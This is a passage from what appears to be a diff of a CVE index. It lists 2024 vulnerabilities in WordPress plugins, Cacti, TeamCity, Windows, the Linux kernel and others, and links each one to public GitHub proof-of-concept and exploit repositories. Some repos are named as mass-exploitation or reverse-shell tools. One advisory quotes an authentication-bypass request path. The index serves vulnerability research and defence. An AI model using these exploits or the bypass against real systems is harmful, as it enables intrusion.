code via uploading a crafted plugin. + + +- [EQSTLab/CVE-2024-25291](https://github.com/EQSTLab/CVE-2024-25291) + +### CVE-2024-25292 (2024-02-29) + +Cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter. + + +- [EQSTLab/CVE-2024-25292](https://github.com/EQSTLab/CVE-2024-25292) + +### CVE-2024-25293 (2024-03-01) + +mjml-app versions 3.0.4 and 3.1.0-beta were discovered to contain a remote code execution (RCE) via the href attribute. + + +- [EQSTLab/CVE-2024-25293](https://github.com/EQSTLab/CVE-2024-25293) + +### CVE-2024-25376 (2024-04-11) + +An issue discovered in Thesycon Software Solutions Gmbh & Co. KG TUSBAudio MSI-based installers before 5.68.0 allows a local attacker to execute arbitrary code via the msiexec.exe repair mode. + + +- [ewilded/CVE-2024-25376-POC](https://github.com/ewilded/CVE-2024-25376-POC) + +### CVE-2024-25381 (2024-02-21) + +There is a Stored XSS Vulnerability in Emlog Pro 2.2.8 Article Publishing, due to non-filtering of quoted content. + + +- [Ox130e07d/CVE-2024-25381](https://github.com/Ox130e07d/CVE-2024-25381) + +### CVE-2024-25411 (2024-09-27) + +A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter in setup.php. + + +- [paragbagul111/CVE-2024-25411](https://github.com/paragbagul111/CVE-2024-25411) + +### CVE-2024-25412 (2024-09-27) + +A cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email field. + + +- [paragbagul111/CVE-2024-25412](https://github.com/paragbagul111/CVE-2024-25412) + +### CVE-2024-25423 (2024-02-22) + +An issue in MAXON CINEMA 4D R2024.2.0 allows a local attacker to execute arbitrary code via a crafted c4d_base.xdl64 file. + + +- [DriverUnload/cve-2024-25423](https://github.com/DriverUnload/cve-2024-25423) + +### CVE-2024-25466 (2024-02-16) + +Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component. + + +- [FixedOctocat/CVE-2024-25466](https://github.com/FixedOctocat/CVE-2024-25466) + +### CVE-2024-25503 (2024-04-04) + +Cross Site Scripting (XSS) vulnerability in Advanced REST Client v.17.0.9 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script to the edit details parameter of the New Project function. + + +- [EQSTLab/CVE-2024-25503](https://github.com/EQSTLab/CVE-2024-25503) + +### CVE-2024-25600 (2024-06-04) + +Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6. + + +- [Chocapikk/CVE-2024-25600](https://github.com/Chocapikk/CVE-2024-25600) +- [Christbowel/CVE-2024-25600_Nuclei-Template](https://github.com/Christbowel/CVE-2024-25600_Nuclei-Template) +- [Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) +- [hy011121/CVE-2024-25600-wordpress-Exploit-RCE](https://github.com/hy011121/CVE-2024-25600-wordpress-Exploit-RCE) +- [K3ysTr0K3R/CVE-2024-25600-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT) +- [X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE](https://github.com/X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE) +- [svchostmm/CVE-2024-25600-mass](https://github.com/svchostmm/CVE-2024-25600-mass) +- [ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/ivanbg2004/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) +- [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600) +- [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600) +- [KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress](https://github.com/KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress) +- [wh6amiGit/CVE-2024-25600](https://github.com/wh6amiGit/CVE-2024-25600) + +### CVE-2024-25641 (2024-05-13) + +Cacti provides an operational monitoring and fault management framework. Prior to version 1.2.27, an arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server. The vulnerability is located within the `import_package()` function defined into the `/lib/import.php` script. The function blindly trusts the filename and file content provided within the XML data, and writes such files into the Cacti base path (or even outside, since path traversal sequences are not filtered). This can be exploited to write or overwrite arbitrary files on the web server, leading to execution of arbitrary PHP code or other security impacts. Version 1.2.27 contains a patch for this issue. + + +- [5ma1l/CVE-2024-25641](https://github.com/5ma1l/CVE-2024-25641) +- [thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26](https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26) +- [Safarchand/CVE-2024-25641](https://github.com/Safarchand/CVE-2024-25641) +- [StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26](https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26) +- [XiaomingX/cve-2024-25641-poc](https://github.com/XiaomingX/cve-2024-25641-poc) +- [D3Ext/CVE-2024-25641](https://github.com/D3Ext/CVE-2024-25641) + +### CVE-2024-25723 (2024-02-27) + +ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2. + + +- [david-botelho-mariano/exploit-CVE-2024-25723](https://github.com/david-botelho-mariano/exploit-CVE-2024-25723) + +### CVE-2024-25731 (2024-03-04) + +The Elink Smart eSmartCam (com.cn.dq.ipc) application 2.1.5 for Android contains hardcoded AES encryption keys that can be extracted from a binary file. Thus, encryption can be defeated by an attacker who can observe packet data (e.g., over Wi-Fi). + + +- [actuator/com.cn.dq.ipc](https://github.com/actuator/com.cn.dq.ipc) + +### CVE-2024-25733 +- [hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC](https://github.com/hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC) + +### CVE-2024-25809 +- [sajaljat/CVE-2024-25809](https://github.com/sajaljat/CVE-2024-25809) + +### CVE-2024-25832 (2024-02-28) + +F-logic DataCube3 v1.0 is vulnerable to unrestricted file upload, which could allow an authenticated malicious actor to upload a file of dangerous type by manipulating the filename extension. + + +- [0xNslabs/CVE-2024-25832-PoC](https://github.com/0xNslabs/CVE-2024-25832-PoC) + +### CVE-2024-25897 (2024-02-21) + +ChurchCRM 5.5.0 FRCatalog.php is vulnerable to Blind SQL Injection (Time-based) via the CurrentFundraiser GET parameter. + + +- [i-100-user/CVE-2024-25897](https://github.com/i-100-user/CVE-2024-25897) + +### CVE-2024-26026 (2024-05-08) + +\n\n\nAn SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI).  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n + + +- [passwa11/CVE-2024-26026](https://github.com/passwa11/CVE-2024-26026) +- [GRTMALDET/Big-IP-Next-CVE-2024-26026](https://github.com/GRTMALDET/Big-IP-Next-CVE-2024-26026) + +### CVE-2024-26144 (2024-02-27) + +Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7. + + +- [gmo-ierae/CVE-2024-26144-test](https://github.com/gmo-ierae/CVE-2024-26144-test) + +### CVE-2024-26160 (2024-03-12) + +Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability + + +- [CrackerCat/CVE-2024-26160](https://github.com/CrackerCat/CVE-2024-26160) + +### CVE-2024-26218 (2024-04-09) + +Windows Kernel Elevation of Privilege Vulnerability + + +- [exploits-forsale/CVE-2024-26218](https://github.com/exploits-forsale/CVE-2024-26218) + +### CVE-2024-26229 (2024-04-09) + +Windows CSC Service Elevation of Privilege Vulnerability + + +- [varwara/CVE-2024-26229](https://github.com/varwara/CVE-2024-26229) +- [RalfHacker/CVE-2024-26229-exploit](https://github.com/RalfHacker/CVE-2024-26229-exploit) +- [apkc/CVE-2024-26229-BOF](https://github.com/apkc/CVE-2024-26229-BOF) +- [team-MineDEV/CVE-2024-26229](https://github.com/team-MineDEV/CVE-2024-26229) +- [Cracked5pider/eop24-26229](https://github.com/Cracked5pider/eop24-26229) +- [mqxmm/CVE-2024-26229](https://github.com/mqxmm/CVE-2024-26229) + +### CVE-2024-26230 (2024-04-09) + +Windows Telephony Server Elevation of Privilege Vulnerability + + +- [kiwids0220/CVE-2024-26230](https://github.com/kiwids0220/CVE-2024-26230) +- [Wa1nut4/CVE-2024-26230](https://github.com/Wa1nut4/CVE-2024-26230) + +### CVE-2024-26304 (2024-05-01) + +There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. \n\n + + +- [X-Projetion/CVE-2024-26304-RCE-exploit](https://github.com/X-Projetion/CVE-2024-26304-RCE-exploit) + +### CVE-2024-26308 (2024-02-19) + +Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26.\n\nUsers are recommended to upgrade to version 1.26, which fixes the issue.\n\n + + +- [crazycatMyopic/cve](https://github.com/crazycatMyopic/cve) + +### CVE-2024-26475 (2024-03-14) + +An issue in radareorg radare2 v.0.9.7 through v.5.8.6 and fixed in v.5.8.8 allows a local attacker to cause a denial of service via the grub_sfs_read_extent function. + + +- [TronciuVlad/CVE-2024-26475](https://github.com/TronciuVlad/CVE-2024-26475) + +### CVE-2024-26503 (2024-03-14) + +Unrestricted File Upload vulnerability in Greek Universities Network Open eClass v.3.15 and earlier allows attackers to run arbitrary code via upload of crafted file to certbadge.php endpoint. + + +- [RoboGR00t/Exploit-CVE-2024-26503](https://github.com/RoboGR00t/Exploit-CVE-2024-26503) + +### CVE-2024-26521 (2024-03-12) + +HTML Injection vulnerability in CE Phoenix v1.0.8.20 and before allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted payload to the english.php component. + + +- [hackervegas001/CVE-2024-26521](https://github.com/hackervegas001/CVE-2024-26521) + +### CVE-2024-26534 +- [sajaljat/CVE-2024-26534](https://github.com/sajaljat/CVE-2024-26534) + +### CVE-2024-26535 +- [sajaljat/CVE-2024-26535](https://github.com/sajaljat/CVE-2024-26535) + +### CVE-2024-26560 +- [sajaljat/CVE-2024-26560](https://github.com/sajaljat/CVE-2024-26560) + +### CVE-2024-26574 (2024-04-08) + +Insecure Permissions vulnerability in Wondershare Filmora v.13.0.51 allows a local attacker to execute arbitrary code via a crafted script to the WSNativePushService.exe + + +- [Alaatk/CVE-2024-26574](https://github.com/Alaatk/CVE-2024-26574) + +### CVE-2024-26581 (2024-02-20) + +In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transactions, skip end interval elements that\nare not yet active. + + +- [madfxr/CVE-2024-26581-Checker](https://github.com/madfxr/CVE-2024-26581-Checker) +- [laoqin1234/Linux-Root-CVE-2024-26581-PoC](https://github.com/laoqin1234/Linux-Root-CVE-2024-26581-PoC) + +### CVE-2024-26817 (2024-04-13) + +In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow. + + +- [MaherAzzouzi/CVE-2024-26817-amdkfd](https://github.com/MaherAzzouzi/CVE-2024-26817-amdkfd) + +### CVE-2024-27088 (2024-02-26) + +es5-ext contains ECMAScript 5 extensions. Passing functions with very long names or complex default argument names into `function#copy` or `function#toStringTokens` may cause the script to stall. The vulnerability is patched in v0.10.63. + + +- [200101WhoAmI/CVE-2024-27088](https://github.com/200101WhoAmI/CVE-2024-27088) + +### CVE-2024-27130 (2024-05-21) + +A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute code via a network.\n\nWe have already fixed the vulnerability in the following version:\nQTS 5.1.7.2770 build 20240520 and later\nQuTS hero h5.1.7.2770 build 20240520 and later + + +- [watchtowrlabs/CVE-2024-27130](https://github.com/watchtowrlabs/CVE-2024-27130) +- [d0rb/CVE-2024-27130](https://github.com/d0rb/CVE-2024-27130) +- [XiaomingX/cve-2024-27130-poc](https://github.com/XiaomingX/cve-2024-27130-poc) + +### CVE-2024-27173 (2024-06-14) + +Remote Command program allows an attacker to get Remote Code Execution by overwriting existing Python files containing executable code. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point.\n https://www.toshibatec.com/contacts/products/ \nAs for the affected products/models/versions, see the reference URL. + + +- [Ieakd/0day-POC-for-CVE-2024-27173](https://github.com/Ieakd/0day-POC-for-CVE-2024-27173) + +### CVE-2024-27198 (2024-03-04) + +In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible + + +- [Chocapikk/CVE-2024-27198](https://github.com/Chocapikk/CVE-2024-27198) +- [yoryio/CVE-2024-27198](https://github.com/yoryio/CVE-2024-27198) +- [W01fh4cker/CVE-2024-27198-RCE](https://github.com/W01fh4cker/CVE-2024-27198-RCE) +- [rampantspark/CVE-2024-27198](https://github.com/rampantspark/CVE-2024-27198) +- [passwa11/CVE-2024-27198-RCE](https://github.com/passwa11/CVE-2024-27198-RCE) +- [CharonDefalt/CVE-2024-27198-RCE](https://github.com/CharonDefalt/CVE-2024-27198-RCE) +- [K3ysTr0K3R/CVE-2024-27198-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT) +- [Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-](https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-) +- [Stuub/RCity-CVE-2024-27198](https://github.com/Stuub/RCity-CVE-2024-27198) +- [HPT-Intern-Task-Submission/CVE-2024-27198](https://github.com/HPT-Intern-Task-Submission/CVE-2024-27198) +- [jrbH4CK/CVE-2024-27198](https://github.com/jrbH4CK/CVE-2024-27198) +- [geniuszly/CVE-2024-27198](https://github.com/geniuszly/CVE-2024-27198) +- [Cythonic1/CVE-2024-27198_POC](https://github.com/Cythonic1/CVE-2024-27198_POC) + +### CVE-2024-27292 (2024-02-29) + +Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. + + +- [th3gokul/CVE-2024-27292](https://github.com/th3gokul/CVE-2024-27292) +- [NingXin2002/Docassemble_poc](https://github.com/NingXin2002/Docassemble_poc) + +### CVE-2024-27316 (2024-04-04) + +HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion. + + +- [lockness-Ko/CVE-2024-27316](https://github.com/lockness-Ko/CVE-2024-27316) +- [aeyesec/CVE-2024-27316_poc](https://github.com/aeyesec/CVE-2024-27316_poc) + +### CVE-2024-27348 (2024-04-22) + +RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11\n\nUsers are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.\n\n + + +- [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348) +- [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348) +- [jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE](https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE) + +### CVE-2024-27460 (2024-05-10) + +A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below. + + +- [xct/CVE-2024-27460](https://github.com/xct/CVE-2024-27460) +- [Alaatk/CVE-2024-27460](https://github.com/Alaatk/CVE-2024-27460) +- [10cks/CVE-2024-27460-installer](https://github.com/10cks/CVE-2024-27460-installer) + +### CVE-2024-27462 +- [Alaatk/CVE-2024-27462](https://github.com/Alaatk/CVE-2024-27462) + +### CVE-2024-27474 (2024-04-10) + +Leantime 3.0.6 is vulnerable to Cross Site Request Forgery (CSRF). This vulnerability allows malicious actors to perform unauthorized actions on behalf of authenticated users, specifically administrators. + + +- [dead1nfluence/Leantime-POC](https://github.com/dead1nfluence/Leantime-POC) + +### CVE-2024-27518 (2024-04-29) + +An issue in SUPERAntiSyware Professional X 10.0.1262 and 10.0.1264 allows unprivileged attackers to escalate privileges via a restore of a crafted DLL file into the C:\Program Files\SUPERAntiSpyware folder. + + +- [secunnix/CVE-2024-27518](https://github.com/secunnix/CVE-2024-27518) + +### CVE-2024-27564 (2024-03-05) + +A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter. + + +- [MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564](https://github.com/MuhammadWaseem29/SSRF-Exploit-CVE-2024-27564) +- [Quantum-Hacker/CVE-2024-27564](https://github.com/Quantum-Hacker/CVE-2024-27564) + +### CVE-2024-27619 (2024-03-29) + +Dlink Dir-3040us A1 1.20b03a hotfix is vulnerable to Buffer Overflow. Any user having read/write access to ftp server can write directly to ram causing buffer overflow if file or files uploaded are greater than available ram. Ftp server allows change of directory to root which is one level up than root of usb flash directory. During upload ram is getting filled and causing system resource exhaustion (no free memory) which causes system to crash and reboot. + + +- [ioprojecton/dir-3040_dos](https://github.com/ioprojecton/dir-3040_dos) + +### CVE-2024-27630 (2024-04-08) + +Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function. + + +- [ally-petitt/CVE-2024-27630](https://github.com/ally-petitt/CVE-2024-27630) + +### CVE-2024-27631 (2024-04-08) + +Cross Site Request Forgery vulnerability in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via siteadmin/usergroup.php + + +- [ally-petitt/CVE-2024-27631](https://github.com/ally-petitt/CVE-2024-27631) + +### CVE-2024-27632 (2024-04-08) + +An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function. + + +- [ally-petitt/CVE-2024-27632](https://github.com/ally-petitt/CVE-2024-27632) + +### CVE-2024-27665 (2024-04-09) + +Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module. + + +- [Thirukrishnan/CVE-2024-27665](https://github.com/Thirukrishnan/CVE-2024-27665) + +### CVE-2024-27673 +- [Alaatk/CVE-2024-27673](https://github.com/Alaatk/CVE-2024-27673) + +### CVE-2024-27674 (2024-04-03) + +Macro Expert through 4.9.4 allows BUILTIN\Users:(OI)(CI)(M) access to the "%PROGRAMFILES(X86)%\GrassSoft\Macro Expert" folder and thus an unprivileged user can escalate to SYSTEM by replacing the MacroService.exe binary. + + +- [Alaatk/CVE-2024-27674](https://github.com/Alaatk/CVE-2024-27674) + +### CVE-2024-27697 +- [SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697](https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697) + +### CVE-2024-27766 (2024-10-17) + +An issue in MariaDB v.11.1 allows a remote attacker to execute arbitrary code via the lib_mysqludf_sys.so function. NOTE: this is disputed by the MariaDB Foundation because no privilege boundary is crossed. + + +- [Ant1sec-ops/CVE-2024-27766](https://github.com/Ant1sec-ops/CVE-2024-27766) + +### CVE-2024-27804 (2024-05-13) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges. + + +- [R00tkitSMM/CVE-2024-27804](https://github.com/R00tkitSMM/CVE-2024-27804) + +### CVE-2024-27815 (2024-06-10) + +An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges. + + +- [jprx/CVE-2024-27815](https://github.com/jprx/CVE-2024-27815) + +### CVE-2024-27821 (2024-05-13) + +A path handling issue was addressed with improved validation. This issue is fixed in iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A shortcut may output sensitive user data without consent. + + +- [0xilis/CVE-2024-27821](https://github.com/0xilis/CVE-2024-27821) + +### CVE-2024-27914 (2024-03-18) + +GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar. This issue has been patched in version 10.0.13.\n + + +- [shellkraft/CVE-2024-27914](https://github.com/shellkraft/CVE-2024-27914) + +### CVE-2024-27954 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Automatic Automatic allows Path Traversal, Server Side Request Forgery.This issue affects Automatic: from n/a through 3.92.0. + + +- [gh-ost00/CVE-2024-27954](https://github.com/gh-ost00/CVE-2024-27954) +- [Quantum-Hacker/CVE-2024-27954](https://github.com/Quantum-Hacker/CVE-2024-27954) + +### CVE-2024-27956 (2024-03-21) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.\n\n + + +- [truonghuuphuc/CVE-2024-27956](https://github.com/truonghuuphuc/CVE-2024-27956) +- [diego-tella/CVE-2024-27956-RCE](https://github.com/diego-tella/CVE-2024-27956-RCE) +- [X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN](https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN) +- [FoxyProxys/CVE-2024-27956](https://github.com/FoxyProxys/CVE-2024-27956) +- [k3ppf0r/CVE-2024-27956](https://github.com/k3ppf0r/CVE-2024-27956) +- [AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956](https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956) +- [W3BW/CVE-2024-27956-RCE-File-Package](https://github.com/W3BW/CVE-2024-27956-RCE-File-Package) +- [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956) +- [itzheartzz/MASS-CVE-2024-27956](https://github.com/itzheartzz/MASS-CVE-2024-27956) +- [TadashiJei/Valve-Press-CVE-2024-27956-RCE](https://github.com/TadashiJei/Valve-Press-CVE-2024-27956-RCE) +- [cve-2024/CVE-2024-27956-RCE](https://github.com/cve-2024/CVE-2024-27956-RCE) +- [ThatNotEasy/CVE-2024-27956](https://github.com/ThatNotEasy/CVE-2024-27956) +- [CERTologists/EXPLOITING-CVE-2024-27956](https://github.com/CERTologists/EXPLOITING-CVE-2024-27956) +- [7aRanchi/CVE-2024-27956-for-fscan](https://github.com/7aRanchi/CVE-2024-27956-for-fscan) + +### CVE-2024-27971 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Premmerce Premmerce Permalink Manager for WooCommerce allows PHP Local File Inclusion.This issue affects Premmerce Permalink Manager for WooCommerce: from n/a through 2.3.10. + + +- [truonghuuphuc/CVE-2024-27971-Note](https://github.com/truonghuuphuc/CVE-2024-27971-Note) + +### CVE-2024-27972 (2024-04-03) + +Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Very Good Plugins WP Fusion Lite allows Command Injection.This issue affects WP Fusion Lite: from n/a through 3.41.24.\n\n + + +- [truonghuuphuc/CVE-2024-27972-Poc](https://github.com/truonghuuphuc/CVE-2024-27972-Poc) + +### CVE-2024-27983 (2024-04-09) + +An attacker can make the Node.js HTTP/2 server completely unavailable by sending a small amount of HTTP/2 frames packets with a few HTTP/2 frames inside. It is possible to leave some data in nghttp2 memory after reset when headers with HTTP/2 CONTINUATION frame are sent to the server and then a TCP connection is abruptly closed by the client triggering the Http2Session destructor while header frames are still being processed (and stored in memory) causing a race condition. + + +- [lirantal/CVE-2024-27983-nodejs-http2](https://github.com/lirantal/CVE-2024-27983-nodejs-http2) + +### CVE-2024-28000 (2024-08-21) + +Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1. + + +- [Alucard0x1/CVE-2024-28000](https://github.com/Alucard0x1/CVE-2024-28000) +- [ebrasha/CVE-2024-28000](https://github.com/ebrasha/CVE-2024-28000) +- [arch1m3d/CVE-2024-28000](https://github.com/arch1m3d/CVE-2024-28000) +- [SSSSuperX/CVE-2024-28000](https://github.com/SSSSuperX/CVE-2024-28000) +- [JohnDoeAnonITA/CVE-2024-28000](https://github.com/JohnDoeAnonITA/CVE-2024-28000) + +### CVE-2024-28085 (2024-03-27) + +wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover. + + +- [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085) +- [oditynet/sleepall](https://github.com/oditynet/sleepall) + +### CVE-2024-28088 (2024-03-03) + +LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.) + + +- [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc) + +### CVE-2024-28116 (2024-03-21) + +Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue. + + +- [akabe1/Graver](https://github.com/akabe1/Graver) +- [gunzf0x/Grav-CMS-RCE-Authenticated](https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated) +- [geniuszly/GenGravSSTIExploit](https://github.com/geniuszly/GenGravSSTIExploit) + +### CVE-2024-28247 (2024-03-27) + +The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pihole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs from behind, reading files is done as a privileged user.If the URL that is in the list of "Adslists" begins with "file*" it is understood that it is updating from a local file, on the other hand if it does not begin with "file*" depending on the state of the response it does one thing or another. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed by 5.18. + + +- [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read) + +### CVE-2024-28255 (2024-03-15) + +OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`. + + +- [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255) + +### CVE-2024-28397 (2024-06-20) + +An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. + + +- [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) +- [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape) + +### CVE-2024-28515 (2024-04-03) + +Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component. + + +- [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515) + +### CVE-2024-28589 (2024-04-03) + +An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before, allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure 